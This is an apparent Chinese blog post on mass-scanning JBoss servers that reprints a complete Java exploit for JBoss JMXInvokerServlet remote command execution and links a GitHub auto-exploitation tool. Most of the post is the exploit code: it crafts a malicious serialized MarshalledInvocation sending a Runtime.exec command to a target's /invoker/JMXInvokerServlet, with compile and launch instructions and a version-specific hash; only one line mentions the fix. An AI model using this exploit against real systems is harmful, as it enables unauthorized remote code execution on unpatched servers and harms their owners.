JBOSS批量扫描

exploit-db提供出了EXP,如下:

  1 /*
  2  * JBoss JMXInvokerServlet Remote Command Execution
  3  * JMXInvoker.java v0.3 - Luca Carettoni @_ikki
  4  *
  5  * This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...).
  6  * Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation"
  7  * serialized Java object allows to execute arbitrary code. This exploit works even if the "Web-Console"
  8  * and the "JMX Console" are protected or disabled.
  9  *
 10  * [FAQ]
 11  *
 12  * Q: Is my target vulnerable?
 13  * A: If http://<target>:8080/invoker/JMXInvokerServlet exists, it's likely exploitable
 14  *
 15  * Q: How to fix it?
 16  * A: Enable authentication in "jmx-invoker-service.xml"
 17  *
 18  * Q: Is this exploit version-dependent?
 19  * A: Unfortunately, yes. An hash value is used to properly invoke a method. 
 20  *    At least comparing version 4.x and 5.x, these hashes are different.
 21  *
 22  * Q: How to compile and launch it?
 23  * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java
 24  *    java  -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker
 25  *    Yes, it's a Java exploit. I can already see some of you complaining....
 26  */
 27  
 28 import java.io.BufferedReader;
 29 import java.io.IOException;
 30 import java.io.InputStream;
 31 import java.io.InputStreamReader;
 32 import java.io.ObjectOutputStream;
 33 import java.lang.reflect.Array;
 34 import java.lang.reflect.Field;
 35 import java.lang.reflect.Method;
 36 import java.net.ConnectException;
 37 import java.net.HttpURLConnection;
 38 import java.net.URL;
 39 import javax.management.MalformedObjectNameException;
 40 import javax.management.ObjectName;
 41 import org.jboss.invocation.MarshalledInvocation; //within jboss.jar (look into the original JBoss installation dir)
 42  
 43 public class JMXInvokerServlet {
 44  
 45     //---------> CHANGE ME <---------
 46     static final int hash = 647347722; //Weaponized against JBoss 4.0.3SP1
 47     static final String url = "http://127.0.0.1:8080/invoker/JMXInvokerServlet";
 48     static final String cmd = "touch /tmp/exectest";
 49     //-------------------------------
 50  
 51     public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, MalformedObjectNameException {
 52  
 53         System.out.println("\n--[ JBoss JMXInvokerServlet Remote Command Execution ]");
 54  
 55         //Create a malicious Java serialized object
 56         MarshalledInvocation payload = new MarshalledInvocation();
 57         payload.setObjectName(new Integer(hash));
 58  
 59         //Executes the MBean invoke operation
 60         Class<?> c = Class.forName("javax.management.MBeanServerConnection");
 61         Method method = c.getDeclaredMethod("invoke", javax.management.ObjectName.class, java.lang.String.class, java.lang.Object[].class, java.lang.String[].class);
 62         payload.setMethod(method);
 63  
 64         //Define MBean's name, operation and pars
 65         Object myObj[] = new Object[4];
 66         //MBean object name
 67         myObj[0] = new ObjectName("jboss.deployer:service=BSHDeployer");
 68         //Operation name
 69         myObj[1] = new String("createScriptDeployment");
 70         //Actual parameters
 71         myObj[2] = new String[]{"Runtime.getRuntime().exec(\"" + cmd + "\");", "Script Name"};
 72         //Operation signature
 73         myObj[3] = new String[]{"java.lang.String", "java.lang.String"};
 74  
 75         payload.setArguments(myObj);
 76         System.out.println("\n--[*] MarshalledInvocation object created");
 77         //For debugging - visualize the raw object
 78         //System.out.println(dump(payload));
 79  
 80         //Serialize the object
 81         try {
 82             //Send the payload
 83             URL server = new URL(url);
 84             HttpURLConnection conn = (HttpURLConnection) server.openConnection();
 85             conn.setRequestMethod("POST");
 86             conn.setDoOutput(true);
 87             conn.setDoInput(true);
 88             conn.setUseCaches(false);
 89             conn.setRequestProperty("Accept", "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2");
 90             conn.setRequestProperty("Connection", "keep-alive");
 91             conn.setRequestProperty("User-Agent", "Java/1.6.0_06");
 92             conn.setRequestProperty("Content-Type", "application/octet-stream");
 93             conn.setRequestProperty("Accept-Encoding", "x-gzip,x-deflate,gzip,deflate");
 94             conn.setRequestProperty("ContentType", "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation");
 95  
 96             ObjectOutputStream wr = new ObjectOutputStream(conn.getOutputStream());
 97             wr.writeObject(payload);
 98             System.out.println("\n--[*] MarshalledInvocation object serialized");
 99             System.out.println("\n--[*] Sending payload...");
100             wr.flush();
101             wr.close();
102  
103             //Get the response
104             InputStream is = conn.getInputStream();
105             BufferedReader rd = new BufferedReader(new InputStreamReader(is));
106             String line;
107             StringBuffer response = new StringBuffer();
108             while ((line = rd.readLine()) != null) {
109                 response.append(line);
110             }
111             rd.close();
112  
113             if (response.indexOf("Script Name") != -1) {
114                 System.out.println("\n--[*] \"" + cmd + "\" successfully executed");
115             } else {
116                 System.out.println("\n--[!] An invocation error occured...");
117             }
118         } catch (ConnectException cex) {
119             System.out.println("\n--[!] A connection error occured...");
120         } catch (IOException ex) {
121             ex.printStackTrace();
122         }
123     }
124  
125     /*
126      * Raw dump of generic Java Objects
127      */
128     static String dump(Object o) {
129         StringBuffer buffer = new StringBuffer();
130         Class oClass = o.getClass();
131  
132         if (oClass.isArray()) {
133             buffer.append("[");
134  
135             for (int i = 0; i < Array.getLength(o); i++) {
136                 if (i > 0) {
137                     buffer.append(",\n");
138                 }
139                 Object value = Array.get(o, i);
140                 buffer.append(value.getClass().isArray() ? dump(value) : value);
141             }
142             buffer.append("]");
143         } else {
144             buffer.append("{");
145             while (oClass != null) {
146                 Field[] fields = oClass.getDeclaredFields();
147                 for (int i = 0; i
148                         < fields.length; i++) {
149                     if (buffer.length() > 1) {
150                         buffer.append(",\n");
151                     }
152                     fields[i].setAccessible(true);
153                     buffer.append(fields[i].getName());
154                     buffer.append("=");
155                     try {
156                         Object value = fields[i].get(o);
157                         if (value != null) {
158                             buffer.append(value.getClass().isArray() ? dump(value) : value);
159                         }
160                     } catch (IllegalAccessException e) {
161                     }
162                 }
163                 oClass = oClass.getSuperclass();
164             }
165             buffer.append("}");
166         }
167         return buffer.toString();
168     }
169 }

批量扫描az0ne在github上已经有了,https://github.com/az0ne/jboss_autoexploit

posted @ 2015-12-11 17:16  sevck  阅读(1124)  评论(0编辑  收藏  举报